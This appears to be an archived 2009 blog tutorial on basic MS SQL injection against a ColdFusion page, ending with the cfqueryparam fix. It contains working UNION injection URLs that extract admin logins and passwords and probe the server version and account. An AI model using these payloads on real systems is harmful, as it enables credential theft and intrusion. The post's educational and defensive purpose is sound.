jw0rd.net » MS SQL http://jw0rd.net Archived Tech Knowledge Mon, 18 May 2009 00:09:42 +0000 http://wordpress.org/?v=2.8 en hourly 1 Basic MS SQL Injection http://jw0rd.net/2009/04/12/basic-ms-sql-injection/ http://jw0rd.net/2009/04/12/basic-ms-sql-injection/#comments Mon, 13 Apr 2009 00:01:44 +0000 admin http://jw0rd.net/?p=252 The most commonly used entry method for web applications today is through SQL injection. Anyone with just a little knowledge of SQL syntax can obtain vital information from a business or inject malicious code to be rendered when anonymous users visit a page. The purpose of the following article is to educate developers and administrators of the security vulnerabilities that may exist in their publicly accessible web sites.

Example:
http://jw0rd.com/test2.cfm?id=1

A basic database driven ColdFusion page that uses the URL parameter ‘id’ in a SQL SELECT statement. This is what the output of the page is supposed to look like:

correct

The coding on this page selects a record from the ‘articles’ table where id = #URL.id#

select * from articles where id = #URL.id#

It then outputs the title, category, and article fields for that row where id = #URL.id#. Like a lot of poorly coded web applications there is no sanitation on the URL parameter ‘id’, so lets alter the SQL statement and add a UNION.

URL encoding – http://www.w3schools.com/TAGS/ref_urlencode.asp
%20 = [space]
%27 = ‘

http://jw0rd.com/test2.cfm?id=1%20union%20select%201,%27%27,login,password%20from%20admin

The full SQL statement is now:
select * from articles union select 1,'',login,password from admin

The output on the page is now two records, one from the articles table and one from the admin table.

oops

Now let’s add a select on @@version to determine the version of SQL the database server is running and also SYSTEM_USER to see if its possibly using a high privileged SQL account such as ’sa’.

http://jw0rd.com/test2.cfm?id=1%20union%20select%201,@@version,SYSTEM_USER,%27%27%20from%20admin%20order%20by%20title

The full SQL statement is now:
select * from articles union select 1,@@version,SYSTEM_USER,'' from admin order by title

oops2

Now that you get the idea of how to exploit through SQL injection how do you prevent it? ALL variables that can be POST’d or GET’d from an anonymous user need to be sanitized. For our ColdFusion example above the use of the ‘cfqueryparam’ tag will get the job done -> http://livedocs.adobe.com/coldfusion/8/htmldocs/help.html?content=Tags_p-q_18.html

Original, vulnerable SQL Statement in test2.cfm:

select * from articles where id = #URL.id#

Updated, secure SQL statement:

select * from articles where id = <cfqueryparam value="#URL.id#" CFSQLType = "CF_SQL_INTEGER">

Now that we are forcing that variable to be of type integer lets try to inject a SQL statement again.

good

SQL injection is no longer possible through the ‘id’ parameter:

Invalid data 1 union select 1,”,login,password from admin for CFSQLTYPE CF_SQL_INTEGER.

Another security risk is the raw ColdFusion error that displays a snippet of our code to an anonymous user. Setting up custom error handling so that is not seen is always a good idea but is an entirely different subject.

Hopefully I will have some extra time soon to post a similar article related to basic MySQL injection techniques.

]]> http://jw0rd.net/2009/04/12/basic-ms-sql-injection/feed/ 0